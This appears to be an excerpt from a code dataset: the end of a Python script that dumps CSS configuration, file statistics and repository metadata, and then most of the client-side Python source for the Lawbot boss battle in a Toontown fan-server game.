        print "%s\n%s\n" % (fname, "=" * len(fname))
        pprint(dict(iter_css_config(CSSParser.read_file(fp))))
        print


def main():
    # CLI entry point: dump the config of each CSS file given on argv.
    import sys
    for fn in sys.argv[1:]:
        print_config(fn)


if __name__ == "__main__":
    main()
31.656
77
0.608036
515
3,957
4.508738
0.269903
0.05857
0.033161
0.020672
0.205857
0.147287
0.107666
0.070629
0.042205
0
0
0.002801
0.278241
3,957
124
78
31.91129
0.810224
0.014658
0
0.14
0
0
0.123044
0
0
0
0
0
0
0
null
null
0
0.08
null
null
0.06
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
5dd847419564638f2f188cabc13087183aa80082
83,813
py
Python
toontown/suit/DistributedLawbotBoss.py
SuperM0use24/TT-CL-Edition
fdad8394f0656ae122b687d603f72afafd220c65
[ "MIT" ]
null
null
null
toontown/suit/DistributedLawbotBoss.py
SuperM0use24/TT-CL-Edition
fdad8394f0656ae122b687d603f72afafd220c65
[ "MIT" ]
1
2021-06-08T17:16:48.000Z
2021-06-08T17:16:48.000Z
toontown/suit/DistributedLawbotBoss.py
SuperM0use24/TT-CL-Edition
fdad8394f0656ae122b687d603f72afafd220c65
[ "MIT" ]
3
2021-06-03T05:36:36.000Z
2021-06-22T15:07:31.000Z
from direct.showbase.ShowBase import * from direct.interval.IntervalGlobal import * from toontown.battle.BattleProps import * from direct.distributed.ClockDelta import * from direct.showbase.PythonUtil import Functor from direct.showbase.PythonUtil import StackTrace from direct.gui.DirectGui import * from panda3d.core import * from libotp import * from direct.fsm import FSM from direct.fsm import ClassicFSM from direct.fsm import State from direct.directnotify import DirectNotifyGlobal from toontown.toonbase import ToontownGlobals from toontown.toonbase import ToontownBattleGlobals import DistributedBossCog from toontown.toonbase import TTLocalizer import SuitDNA from toontown.toon import Toon from toontown.battle import BattleBase from direct.directutil import Mopath from direct.showutil import Rope from toontown.distributed import DelayDelete from toontown.battle import MovieToonVictory from toontown.building import ElevatorUtils from toontown.battle import RewardPanel from toontown.toon import NPCToons from direct.task import Task import random import math from toontown.coghq import CogDisguiseGlobals from toontown.building import ElevatorConstants from toontown.toonbase import ToontownTimer OneBossCog = None class DistributedLawbotBoss(DistributedBossCog.DistributedBossCog, FSM.FSM): notify = DirectNotifyGlobal.directNotify.newCategory('DistributedLawbotBoss') debugPositions = False def __init__(self, cr): self.notify.debug('----- __init___') DistributedBossCog.DistributedBossCog.__init__(self, cr) FSM.FSM.__init__(self, 'DistributedLawbotBoss') self.lawyers = [] self.lawyerRequest = None self.bossDamage = 0 self.attackCode = None self.attackAvId = 0 self.recoverRate = 0 self.recoverStartTime = 0 self.bossDamageMovie = None self.everThrownPie = 0 self.battleThreeMusicTime = 0 self.insidesANodePath = None self.insidesBNodePath = None self.strafeInterval = None self.onscreenMessage = None self.bossMaxDamage = ToontownGlobals.LawbotBossMaxDamage self.elevatorType 
= ElevatorConstants.ELEVATOR_CJ self.gavels = {} self.chairs = {} self.cannons = {} self.useCannons = 1 self.juryBoxIval = None self.juryTimer = None self.witnessToon = None self.witnessToonOnstage = False self.numToonJurorsSeated = 0 self.mainDoor = None self.reflectedMainDoor = None self.panFlashInterval = None self.panDamage = ToontownGlobals.LawbotBossDefensePanDamage if base.config.GetBool('lawbot-boss-cheat', 0): self.panDamage = 25 self.evidenceHitSfx = None self.toonUpSfx = None self.bonusTimer = None self.warningSfx = None self.juryMovesSfx = None self.baseColStashed = False self.battleDifficulty = 0 self.bonusWeight = 0 self.numJurorsLocalToonSeated = 0 self.cannonIndex = -1 return def announceGenerate(self): global OneBossCog self.notify.debug('----- announceGenerate') DistributedBossCog.DistributedBossCog.announceGenerate(self) self.setName(TTLocalizer.LawbotBossName) nameInfo = TTLocalizer.BossCogNameWithDept % {'name': self._name, 'dept': SuitDNA.getDeptFullname(self.style.dept)} self.setDisplayName(nameInfo) self.piesRestockSfx = loader.loadSfx('phase_5/audio/sfx/LB_receive_evidence.ogg') self.rampSlideSfx = loader.loadSfx('phase_9/audio/sfx/CHQ_VP_ramp_slide.ogg') self.evidenceHitSfx = loader.loadSfx('phase_11/audio/sfx/LB_evidence_hit.ogg') self.warningSfx = loader.loadSfx('phase_9/audio/sfx/CHQ_GOON_tractor_beam_alarmed.ogg') self.juryMovesSfx = loader.loadSfx('phase_11/audio/sfx/LB_jury_moves.ogg') self.toonUpSfx = loader.loadSfx('phase_11/audio/sfx/LB_toonup.ogg') self.strafeSfx = [] for i in xrange(10): self.strafeSfx.append(loader.loadSfx('phase_3.5/audio/sfx/SA_shred.ogg')) render.setTag('pieCode', str(ToontownGlobals.PieCodeNotBossCog)) insidesA = CollisionPolygon(Point3(4.0, -2.0, 5.0), Point3(-4.0, -2.0, 5.0), Point3(-4.0, -2.0, 0.5), Point3(4.0, -2.0, 0.5)) insidesANode = CollisionNode('BossZap') insidesANode.addSolid(insidesA) insidesANode.setCollideMask(ToontownGlobals.PieBitmask | ToontownGlobals.WallBitmask) self.insidesANodePath = 
self.axle.attachNewNode(insidesANode) self.insidesANodePath.setTag('pieCode', str(ToontownGlobals.PieCodeBossInsides)) self.insidesANodePath.stash() insidesB = CollisionPolygon(Point3(-4.0, 2.0, 5.0), Point3(4.0, 2.0, 5.0), Point3(4.0, 2.0, 0.5), Point3(-4.0, 2.0, 0.5)) insidesBNode = CollisionNode('BossZap') insidesBNode.addSolid(insidesB) insidesBNode.setCollideMask(ToontownGlobals.PieBitmask | ToontownGlobals.WallBitmask) self.insidesBNodePath = self.axle.attachNewNode(insidesBNode) self.insidesBNodePath.setTag('pieCode', str(ToontownGlobals.PieCodeBossInsides)) self.insidesBNodePath.stash() target = CollisionTube(0, -1, 4, 0, -1, 9, 3.5) targetNode = CollisionNode('BossZap') targetNode.addSolid(target) targetNode.setCollideMask(ToontownGlobals.PieBitmask) self.targetNodePath = self.pelvis.attachNewNode(targetNode) self.targetNodePath.setTag('pieCode', str(ToontownGlobals.PieCodeBossCog)) shield = CollisionTube(0, 1, 4, 0, 1, 7, 3.5) shieldNode = CollisionNode('BossZap') shieldNode.addSolid(shield) shieldNode.setCollideMask(ToontownGlobals.PieBitmask | ToontownGlobals.CameraBitmask) shieldNodePath = self.pelvis.attachNewNode(shieldNode) disk = loader.loadModel('phase_9/models/char/bossCog-gearCollide') disk.find('**/+CollisionNode').setName('BossZap') disk.reparentTo(self.pelvis) disk.setZ(0.8) self.loadEnvironment() self.__makeWitnessToon() self.__loadMopaths() localAvatar.chatMgr.chatInputSpeedChat.addCJMenu() if OneBossCog != None: self.notify.warning('Multiple BossCogs visible.') OneBossCog = self return def disable(self): global OneBossCog self.notify.debug('----- disable') DistributedBossCog.DistributedBossCog.disable(self) self.request('Off') self.unloadEnvironment() self.__cleanupWitnessToon() self.__unloadMopaths() self.__clearOnscreenMessage() taskMgr.remove(self.uniqueName('PieAdvice')) self.__cleanupStrafe() self.__cleanupJuryBox() render.clearTag('pieCode') self.targetNodePath.detachNode() self.cr.relatedObjectMgr.abortRequest(self.lawyerRequest) 
self.lawyerRequest = None self.betweenBattleMusic.stop() self.promotionMusic.stop() self.stingMusic.stop() self.battleTwoMusic.stop() self.battleThreeMusic.stop() self.epilogueMusic.stop() if self.juryTimer: self.juryTimer.destroy() del self.juryTimer if self.bonusTimer: self.bonusTimer.destroy() del self.bonusTimer localAvatar.chatMgr.chatInputSpeedChat.removeCJMenu() if OneBossCog == self: OneBossCog = None return def delete(self): self.notify.debug('----- delete') DistributedBossCog.DistributedBossCog.delete(self) def d_hitBoss(self, bossDamage): self.notify.debug('----- d_hitBoss') self.sendUpdate('hitBoss', [bossDamage]) def d_healBoss(self, bossHeal): self.notify.debug('----- d_bossHeal') self.sendUpdate('healBoss', [bossHeal]) def d_hitBossInsides(self): self.notify.debug('----- d_hitBossInsides') self.sendUpdate('hitBossInsides', []) def d_hitDefensePan(self): self.notify.debug('----- d_hitDefensePan') self.sendUpdate('hitDefensePan', []) def d_hitProsecutionPan(self): self.notify.debug('----- d_hitProsecutionPan') self.sendUpdate('hitProsecutionPan', []) def d_hitToon(self, toonId): self.notify.debug('----- d_hitToon') self.sendUpdate('hitToon', [toonId]) def gotToon(self, toon): stateName = self.state if stateName == 'Elevator': self.placeToonInElevator(toon) def setLawyerIds(self, lawyerIds): self.lawyers = [] self.cr.relatedObjectMgr.abortRequest(self.lawyerRequest) self.lawyerRequest = self.cr.relatedObjectMgr.requestObjects(lawyerIds, allCallback=self.__gotLawyers) def __gotLawyers(self, lawyers): self.lawyerRequest = None self.lawyers = lawyers for i in xrange(len(self.lawyers)): suit = self.lawyers[i] suit.fsm.request('neutral') suit.loop('neutral') suit.setBossCogId(self.doId) return def setBossDamage(self, bossDamage, recoverRate, timestamp): recoverStartTime = globalClockDelta.networkToLocalTime(timestamp) self.bossDamage = bossDamage self.recoverRate = recoverRate self.recoverStartTime = recoverStartTime taskName = 'RecoverBossDamage' 
taskMgr.remove(taskName) if self.bossDamageMovie: if self.bossDamage >= self.bossMaxDamage: self.notify.debug('finish the movie then transition to NearVictory') self.bossDamageMovie.resumeUntil(self.bossDamageMovie.getDuration()) else: self.bossDamageMovie.resumeUntil(self.bossDamage * self.bossDamageToMovie) if self.recoverRate: taskMgr.add(self.__recoverBossDamage, taskName) self.makeScaleReflectDamage() self.bossHealthBar.update(self.bossMaxDamage - bossDamage, self.bossMaxDamage) def getBossDamage(self): self.notify.debug('----- getBossDamage') now = globalClock.getFrameTime() elapsed = now - self.recoverStartTime return max(self.bossDamage - self.recoverRate * elapsed / 60.0, 0) def __recoverBossDamage(self, task): self.notify.debug('----- __recoverBossDamage') if self.bossDamageMovie: self.bossDamageMovie.setT(self.getBossDamage() * self.bossDamageToMovie) return Task.cont def __walkToonToPromotion(self, toonId, delay, mopath, track, delayDeletes): self.notify.debug('----- __walkToonToPromotion') toon = base.cr.doId2do.get(toonId) if toon: destPos = toon.getPos() self.placeToonInElevator(toon) toon.wrtReparentTo(render) ival = Sequence(Wait(delay), Func(toon.suit.setPlayRate, 1, 'walk'), Func(toon.suit.loop, 'walk'), toon.posInterval(1, Point3(0, 90, 20)), ParallelEndTogether(MopathInterval(mopath, toon), toon.posInterval(2, destPos, blendType='noBlend')), Func(toon.suit.loop, 'neutral')) track.append(ival) delayDeletes.append(DelayDelete.DelayDelete(toon, 'LawbotBoss.__walkToonToPromotion')) def __walkSuitToPoint(self, node, fromPos, toPos): self.notify.debug('----- __walkSuitToPoint') vector = Vec3(toPos - fromPos) distance = vector.length() time = distance / (ToontownGlobals.SuitWalkSpeed * 1.8) return Sequence(Func(node.setPos, fromPos), Func(node.headsUp, toPos), node.posInterval(time, toPos)) def __makeRollToBattleTwoMovie(self): startPos = Point3(ToontownGlobals.LawbotBossBattleOnePosHpr[0], ToontownGlobals.LawbotBossBattleOnePosHpr[1], 
ToontownGlobals.LawbotBossBattleOnePosHpr[2]) if self.arenaSide: topRampPos = Point3(*ToontownGlobals.LawbotBossTopRampPosB) topRampTurnPos = Point3(*ToontownGlobals.LawbotBossTopRampTurnPosB) p3Pos = Point3(*ToontownGlobals.LawbotBossP3PosB) else: topRampPos = Point3(*ToontownGlobals.LawbotBossTopRampPosA) topRampTurnPos = Point3(*ToontownGlobals.LawbotBossTopRampTurnPosA) p3Pos = Point3(*ToontownGlobals.LawbotBossP3PosA) battlePos = Point3(ToontownGlobals.LawbotBossBattleTwoPosHpr[0], ToontownGlobals.LawbotBossBattleTwoPosHpr[1], ToontownGlobals.LawbotBossBattleTwoPosHpr[2]) battleHpr = VBase3(ToontownGlobals.LawbotBossBattleTwoPosHpr[3], ToontownGlobals.LawbotBossBattleTwoPosHpr[4], ToontownGlobals.LawbotBossBattleTwoPosHpr[5]) bossTrack = Sequence() self.notify.debug('calling setPosHpr') myInterval = camera.posHprInterval(8, Point3(-22, -100, 35), Point3(-10, -13, 0), startPos=Point3(-22, -90, 35), startHpr=Point3(-10, -13, 0), blendType='easeInOut') chatTrack = Sequence(Func(self.setChatAbsolute, TTLocalizer.LawbotBossTempJury1, CFSpeech), Func(camera.reparentTo, localAvatar), Func(camera.setPos, localAvatar.getOldCameraPos()), Func(camera.setHpr, 0, 0, 0), Func(self.releaseToons, 1)) bossTrack.append(Func(self.getGeomNode().setH, 180)) track, hpr = self.rollBossToPoint(startPos, None, battlePos, None, 0) bossTrack.append(track) track, hpr = self.rollBossToPoint(battlePos, hpr, battlePos, battleHpr, 0) self.makeToonsWait() finalPodiumPos = Point3(self.podium.getX(), self.podium.getY(), self.podium.getZ() + ToontownGlobals.LawbotBossBattleTwoPosHpr[2]) finalReflectedPodiumPos = Point3(self.reflectedPodium.getX(), self.reflectedPodium.getY(), self.reflectedPodium.getZ() + ToontownGlobals.LawbotBossBattleTwoPosHpr[2]) return Sequence(chatTrack, bossTrack, Func(self.getGeomNode().setH, 0), Parallel(self.podium.posInterval(5.0, finalPodiumPos), self.reflectedPodium.posInterval(5.0, finalReflectedPodiumPos), Func(self.stashBoss), self.posInterval(5.0, battlePos), 
Func(taskMgr.doMethodLater, 0.01, self.unstashBoss, 'unstashBoss')), name=self.uniqueName('BattleTwoMovie')) def __makeRollToBattleThreeMovie(self): startPos = Point3(ToontownGlobals.LawbotBossBattleTwoPosHpr[0], ToontownGlobals.LawbotBossBattleTwoPosHpr[1], ToontownGlobals.LawbotBossBattleTwoPosHpr[2]) battlePos = Point3(ToontownGlobals.LawbotBossBattleThreePosHpr[0], ToontownGlobals.LawbotBossBattleThreePosHpr[1], ToontownGlobals.LawbotBossBattleThreePosHpr[2]) battleHpr = VBase3(ToontownGlobals.LawbotBossBattleThreePosHpr[3], ToontownGlobals.LawbotBossBattleThreePosHpr[4], ToontownGlobals.LawbotBossBattleThreePosHpr[5]) bossTrack = Sequence() myInterval = camera.posHprInterval(8, Point3(-22, -100, 35), Point3(-10, -13, 0), startPos=Point3(-22, -90, 35), startHpr=Point3(-10, -13, 0), blendType='easeInOut') chatTrack = Sequence(Func(self.setChatAbsolute, TTLocalizer.LawbotBossTrialChat1, CFSpeech), Func(camera.reparentTo, localAvatar), Func(camera.setPos, localAvatar.getOldCameraPos()), Func(camera.setHpr, 0, 0, 0), Func(self.releaseToons, 1)) bossTrack.append(Func(self.getGeomNode().setH, 180)) bossTrack.append(Func(self.loop, 'Ff_neutral')) track, hpr = self.rollBossToPoint(startPos, None, battlePos, None, 0) bossTrack.append(track) track, hpr = self.rollBossToPoint(battlePos, hpr, battlePos, battleHpr, 0) self.makeToonsWait() return Sequence(chatTrack, bossTrack, Func(self.getGeomNode().setH, 0), name=self.uniqueName('BattleTwoMovie')) def toNeutralMode(self): if self.cr: place = self.cr.playGame.getPlace() if place and hasattr(place, 'fsm'): place.setState('waitForBattle') def makeToonsWait(self): self.notify.debug('makeToonsWait') for toonId in self.involvedToons: toon = self.cr.doId2do.get(toonId) if toon: toon.stopLookAround() toon.stopSmooth() if self.hasLocalToon(): self.toMovieMode() for toonId in self.involvedToons: toon = self.cr.doId2do.get(toonId) if toon: toon.loop('neutral') def makeEndOfBattleMovie(self, hasLocalToon): name = 
self.uniqueName('Drop') seq = Sequence(name=name) seq += [Wait(0.0)] if hasLocalToon: seq += [Func(self.show), Func(camera.reparentTo, localAvatar), Func(camera.setPos, localAvatar.getOldCameraPos()), Func(camera.setHpr, 0, 0, 0)] seq.append(Func(self.setChatAbsolute, TTLocalizer.LawbotBossPassExam, CFSpeech)) seq.append(Wait(5.0)) seq.append(Func(self.clearChat)) return seq def __makeBossDamageMovie(self): self.notify.debug('---- __makeBossDamageMovie') startPos = Point3(ToontownGlobals.LawbotBossBattleThreePosHpr[0], ToontownGlobals.LawbotBossBattleThreePosHpr[1], ToontownGlobals.LawbotBossBattleThreePosHpr[2]) startHpr = Point3(*ToontownGlobals.LawbotBossBattleThreeHpr) bottomPos = Point3(*ToontownGlobals.LawbotBossBottomPos) deathPos = Point3(*ToontownGlobals.LawbotBossDeathPos) self.setPosHpr(startPos, startHpr) bossTrack = Sequence() bossTrack.append(Func(self.loop, 'Ff_neutral')) track, hpr = self.rollBossToPoint(startPos, startHpr, bottomPos, None, 1) bossTrack.append(track) track, hpr = self.rollBossToPoint(bottomPos, startHpr, deathPos, None, 1) bossTrack.append(track) duration = bossTrack.getDuration() return bossTrack def __showOnscreenMessage(self, text): self.notify.debug('----- __showOnscreenmessage') if self.onscreenMessage: self.onscreenMessage.destroy() self.onscreenMessage = None self.onscreenMessage = DirectLabel(text=text, text_fg=VBase4(1, 1, 1, 1), text_align=TextNode.ACenter, relief=None, pos=(0, 0, 0.35), scale=0.1) return def __clearOnscreenMessage(self): if self.onscreenMessage: self.onscreenMessage.destroy() self.onscreenMessage = None return def __showWaitingMessage(self, task): self.notify.debug('----- __showWaitingMessage') self.__showOnscreenMessage(TTLocalizer.BuildingWaitingForVictors) def loadEnvironment(self): self.notify.debug('----- loadEnvironment') DistributedBossCog.DistributedBossCog.loadEnvironment(self) self.geom = loader.loadModel('phase_11/models/lawbotHQ/LawbotCourtroom3') self.geom.setPos(0, 0, -71.601) 
self.geom.setScale(1) self.elevatorEntrance = self.geom.find('**/elevator_origin') self.elevatorEntrance.getChildren().detach() self.elevatorEntrance.setScale(1) elevatorModel = loader.loadModel('phase_11/models/lawbotHQ/LB_Elevator') elevatorModel.reparentTo(self.elevatorEntrance) self.setupElevator(elevatorModel) self.promotionMusic = base.loader.loadMusic('phase_7/audio/bgm/encntr_suit_winning_indoor.ogg') self.betweenBattleMusic = base.loader.loadMusic('phase_9/audio/bgm/encntr_toon_winning.ogg') self.battleTwoMusic = base.loader.loadMusic('phase_11/audio/bgm/LB_juryBG.ogg') floor = self.geom.find('**/MidVaultFloor1') if floor.isEmpty(): floor = self.geom.find('**/CR3_Floor') self.evFloor = self.replaceCollisionPolysWithPlanes(floor) self.evFloor.reparentTo(self.geom) self.evFloor.setName('floor') plane = CollisionPlane(Plane(Vec3(0, 0, 1), Point3(0, 0, -50))) planeNode = CollisionNode('dropPlane') planeNode.addSolid(plane) planeNode.setCollideMask(ToontownGlobals.PieBitmask) self.geom.attachNewNode(planeNode) self.door3 = self.geom.find('**/SlidingDoor1/') if self.door3.isEmpty(): self.door3 = self.geom.find('**/interior/CR3_Door') self.mainDoor = self.geom.find('**/Door_1') if not self.mainDoor.isEmpty(): itemsToHide = ['interior/Door_1'] for str in itemsToHide: stuffToHide = self.geom.find('**/%s' % str) if not stuffToHide.isEmpty(): self.notify.debug('found %s' % stuffToHide) stuffToHide.wrtReparentTo(self.mainDoor) else: self.notify.debug('not found %s' % stuffToHide) self.reflectedMainDoor = self.geom.find('**/interiorrefl/CR3_Door') if not self.reflectedMainDoor.isEmpty(): itemsToHide = ['Reflections/Door_1'] for str in itemsToHide: stuffToHide = self.geom.find('**/%s' % str) if not stuffToHide.isEmpty(): self.notify.debug('found %s' % stuffToHide) stuffToHide.wrtReparentTo(self.reflectedMainDoor) else: self.notify.debug('not found %s' % stuffToHide) self.geom.reparentTo(render) self.loadWitnessStand() self.loadScale() self.scaleNodePath.stash() 
self.loadJuryBox() self.loadPodium() ug = self.geom.find('**/Reflections') ug.setBin('ground', -10) def loadJuryBox(self): self.juryBox = self.geom.find('**/JuryBox') juryBoxPos = self.juryBox.getPos() newPos = juryBoxPos - Point3(*ToontownGlobals.LawbotBossJuryBoxRelativeEndPos) if not self.debugPositions: self.juryBox.setPos(newPos) self.reflectedJuryBox = self.geom.find('**/JuryBox_Geo_Reflect') reflectedJuryBoxPos = self.reflectedJuryBox.getPos() newReflectedPos = reflectedJuryBoxPos - Point3(*ToontownGlobals.LawbotBossJuryBoxRelativeEndPos) if not self.debugPositions: self.reflectedJuryBox.setPos(newReflectedPos) if not self.reflectedJuryBox.isEmpty(): if self.debugPositions: self.reflectedJuryBox.show() self.reflectedJuryBox.setZ(self.reflectedJuryBox.getZ() + ToontownGlobals.LawbotBossJuryBoxRelativeEndPos[2]) def loadPodium(self): self.podium = self.geom.find('**/Podium') newZ = self.podium.getZ() - ToontownGlobals.LawbotBossBattleTwoPosHpr[2] if not self.debugPositions: self.podium.setZ(newZ) self.reflectedPodium = self.geom.find('**/Podium_Geo1_Refl') reflectedZ = self.reflectedPodium.getZ() if not self.debugPositions: self.reflectedPodium.setZ(reflectedZ) if not self.reflectedPodium.isEmpty(): if self.debugPositions: self.reflectedPodium.show() def loadCannons(self): pass def loadWitnessStand(self): self.realWitnessStand = self.geom.find('**/WitnessStand') if not self.realWitnessStand.isEmpty(): pass self.reflectedWitnessStand = self.geom.find('**/Witnessstand_Geo_Reflect') if not self.reflectedWitnessStand.isEmpty(): pass colNode = self.realWitnessStand.find('**/witnessStandCollisions/Witnessstand_Collision') colNode.setName('WitnessStand') def loadScale(self): self.useProgrammerScale = base.config.GetBool('want-injustice-scale-debug', 0) if self.useProgrammerScale: self.loadScaleOld() else: self.loadScaleNew() def __debugScale(self): prosecutionPanPos = self.prosecutionPanNodePath.getPos() origin = Point3(0, 0, 0) prosecutionPanRelPos = 
self.scaleNodePath.getRelativePoint(self.prosecutionPanNodePath, origin) panRenderPos = render.getRelativePoint(self.prosecutionPanNodePath, origin) self.notify.debug('prosecutionPanPos = %s' % prosecutionPanPos) self.notify.debug('prosecutionPanRelPos = %s' % prosecutionPanRelPos) self.notify.debug('panRenderPos = %s' % panRenderPos) prosecutionLocatorPos = self.prosecutionLocator.getPos() prosecutionLocatorRelPos = self.scaleNodePath.getRelativePoint(self.prosecutionLocator, origin) locatorRenderPos = render.getRelativePoint(self.prosecutionLocator, origin) self.notify.debug('prosecutionLocatorPos = %s ' % prosecutionLocatorPos) self.notify.debug('prosecutionLocatorRelPos = %s ' % prosecutionLocatorRelPos) self.notify.debug('locatorRenderPos = %s' % locatorRenderPos) beamPos = self.beamNodePath.getPos() beamRelPos = self.scaleNodePath.getRelativePoint(self.beamNodePath, origin) beamRenderPos = render.getRelativePoint(self.beamNodePath, origin) self.notify.debug('beamPos = %s' % beamPos) self.notify.debug('beamRelPos = %s' % beamRelPos) self.notify.debug('beamRenderPos = %s' % beamRenderPos) beamBoundsCenter = self.beamNodePath.getBounds().getCenter() self.notify.debug('beamBoundsCenter = %s' % beamBoundsCenter) beamLocatorBounds = self.beamLocator.getBounds() beamLocatorPos = beamLocatorBounds.getCenter() self.notify.debug('beamLocatorPos = %s' % beamLocatorPos) def loadScaleNew(self): self.scaleNodePath = loader.loadModel('phase_11/models/lawbotHQ/scale') self.beamNodePath = self.scaleNodePath.find('**/scaleBeam') self.defensePanNodePath = self.scaleNodePath.find('**/defensePan') self.prosecutionPanNodePath = self.scaleNodePath.find('**/prosecutionPan') self.defenseColNodePath = self.scaleNodePath.find('**/DefenseCol') self.defenseColNodePath.setTag('pieCode', str(ToontownGlobals.PieCodeDefensePan)) self.prosecutionColNodePath = self.scaleNodePath.find('**/ProsecutionCol') self.prosecutionColNodePath.setTag('pieCode', str(ToontownGlobals.PieCodeProsecutionPan)) 
self.standNodePath = self.scaleNodePath.find('**/scaleStand') self.scaleNodePath.setPosHpr(*ToontownGlobals.LawbotBossInjusticePosHpr) self.defenseLocator = self.scaleNodePath.find('**/DefenseLocator') defenseLocBounds = self.defenseLocator.getBounds() defenseLocPos = defenseLocBounds.getCenter() self.notify.debug('defenseLocatorPos = %s' % defenseLocPos) self.defensePanNodePath.setPos(defenseLocPos) self.defensePanNodePath.reparentTo(self.beamNodePath) self.notify.debug('defensePanNodePath.getPos()=%s' % self.defensePanNodePath.getPos()) self.prosecutionLocator = self.scaleNodePath.find('**/ProsecutionLocator') prosecutionLocBounds = self.prosecutionLocator.getBounds() prosecutionLocPos = prosecutionLocBounds.getCenter() self.notify.debug('prosecutionLocatorPos = %s' % prosecutionLocPos) self.prosecutionPanNodePath.setPos(prosecutionLocPos) self.prosecutionPanNodePath.reparentTo(self.beamNodePath) self.beamLocator = self.scaleNodePath.find('**/StandLocator1') beamLocatorBounds = self.beamLocator.getBounds() beamLocatorPos = beamLocatorBounds.getCenter() negBeamLocatorPos = -beamLocatorPos self.notify.debug('beamLocatorPos = %s' % beamLocatorPos) self.notify.debug('negBeamLocatorPos = %s' % negBeamLocatorPos) self.beamNodePath.setPos(beamLocatorPos) self.scaleNodePath.setScale(*ToontownGlobals.LawbotBossInjusticeScale) self.scaleNodePath.wrtReparentTo(self.geom) self.baseHighCol = self.scaleNodePath.find('**/BaseHighCol') oldBitMask = self.baseHighCol.getCollideMask() newBitMask = oldBitMask & ~ToontownGlobals.PieBitmask newBitMask = newBitMask & ~ToontownGlobals.CameraBitmask self.baseHighCol.setCollideMask(newBitMask) self.defenseHighCol = self.scaleNodePath.find('**/DefenseHighCol') self.defenseHighCol.stash() self.defenseHighCol.setCollideMask(newBitMask) self.baseTopCol = self.scaleNodePath.find('**/Scale_base_top_collision') self.baseSideCol = self.scaleNodePath.find('**/Scale_base_side_col') self.defenseLocator.hide() self.prosecutionLocator.hide() 
self.beamLocator.hide() def loadScaleOld(self): startingTilt = 0 self.scaleNodePath = NodePath('injusticeScale') beamGeom = self.createBlock(0.25, 2, 0.125, -0.25, -2, -0.125, 0, 1.0, 0, 1.0) self.beamNodePath = NodePath('scaleBeam') self.beamNodePath.attachNewNode(beamGeom) self.beamNodePath.setPos(0, 0, 3) self.beamNodePath.reparentTo(self.scaleNodePath) defensePanGeom = self.createBlock(0.5, 0.5, 0, -0.5, -0.5, -2, 0, 0, 1.0, 0.25) self.defensePanNodePath = NodePath('defensePan') self.defensePanNodePath.attachNewNode(defensePanGeom) self.defensePanNodePath.setPos(0, -2, 0) self.defensePanNodePath.reparentTo(self.beamNodePath) defenseTube = CollisionTube(0, 0, -0.5, 0, 0, -1.5, 0.6) defenseTube.setTangible(1) defenseCollNode = CollisionNode('DefenseCol') defenseCollNode.addSolid(defenseTube) self.defenseColNodePath = self.defensePanNodePath.attachNewNode(defenseCollNode) self.defenseColNodePath.setTag('pieCode', str(ToontownGlobals.PieCodeDefensePan)) prosecutionPanGeom = self.createBlock(0.5, 0.5, 0, -0.5, -0.5, -2, 1.0, 0, 0, 1.0) self.prosecutionPanNodePath = NodePath('prosecutionPan') self.prosecutionPanNodePath.attachNewNode(prosecutionPanGeom) self.prosecutionPanNodePath.setPos(0, 2, 0) self.prosecutionPanNodePath.reparentTo(self.beamNodePath) prosecutionTube = CollisionTube(0, 0, -0.5, 0, 0, -1.5, 0.6) prosecutionTube.setTangible(1) prosecutionCollNode = CollisionNode(self.uniqueName('ProsecutionCol')) prosecutionCollNode.addSolid(prosecutionTube) self.prosecutionColNodePath = self.prosecutionPanNodePath.attachNewNode(prosecutionCollNode) self.prosecutionColNodePath.setTag('pieCode', str(ToontownGlobals.PieCodeProsecutionPan)) standGeom = self.createBlock(0.25, 0.25, 0, -0.25, -0.25, 3) self.standNodePath = NodePath('scaleStand') self.standNodePath.attachNewNode(standGeom) self.standNodePath.reparentTo(self.scaleNodePath) self.scaleNodePath.setPosHpr(*ToontownGlobals.LawbotBossInjusticePosHpr) self.scaleNodePath.setScale(5.0) 
self.scaleNodePath.wrtReparentTo(self.geom) self.setScaleTilt(startingTilt) def setScaleTilt(self, tilt): self.beamNodePath.setP(tilt) if self.useProgrammerScale: self.defensePanNodePath.setP(-tilt) self.prosecutionPanNodePath.setP(-tilt) else: self.defensePanNodePath.setP(-tilt) self.prosecutionPanNodePath.setP(-tilt) def stashBaseCol(self): if not self.baseColStashed: self.notify.debug('stashBaseCol') self.baseTopCol.stash() self.baseSideCol.stash() self.baseColStashed = True def unstashBaseCol(self): if self.baseColStashed: self.notify.debug('unstashBaseCol') self.baseTopCol.unstash() self.baseSideCol.unstash() self.baseColStashed = False def makeScaleReflectDamage(self): diffDamage = self.bossDamage - ToontownGlobals.LawbotBossInitialDamage diffDamage *= 1.0 if diffDamage >= 0: percentDamaged = diffDamage / (ToontownGlobals.LawbotBossMaxDamage - ToontownGlobals.LawbotBossInitialDamage) tilt = percentDamaged * ToontownGlobals.LawbotBossWinningTilt else: percentDamaged = diffDamage / (ToontownGlobals.LawbotBossInitialDamage - 0) tilt = percentDamaged * ToontownGlobals.LawbotBossWinningTilt self.setScaleTilt(tilt) if self.bossDamage < ToontownGlobals.LawbotBossMaxDamage * 0.85: self.unstashBaseCol() else: self.stashBaseCol() def unloadEnvironment(self): self.notify.debug('----- unloadEnvironment') DistributedBossCog.DistributedBossCog.unloadEnvironment(self) self.geom.removeNode() del self.geom def __loadMopaths(self): self.notify.debug('----- __loadMopaths') self.toonsEnterA = Mopath.Mopath() self.toonsEnterA.loadFile('phase_9/paths/bossBattle-toonsEnterA') self.toonsEnterA.fFaceForward = 1 self.toonsEnterA.timeScale = 35 self.toonsEnterB = Mopath.Mopath() self.toonsEnterB.loadFile('phase_9/paths/bossBattle-toonsEnterB') self.toonsEnterB.fFaceForward = 1 self.toonsEnterB.timeScale = 35 def __unloadMopaths(self): self.notify.debug('----- __unloadMopaths') self.toonsEnterA.reset() self.toonsEnterB.reset() def enterOff(self): self.notify.debug('----- enterOff') 
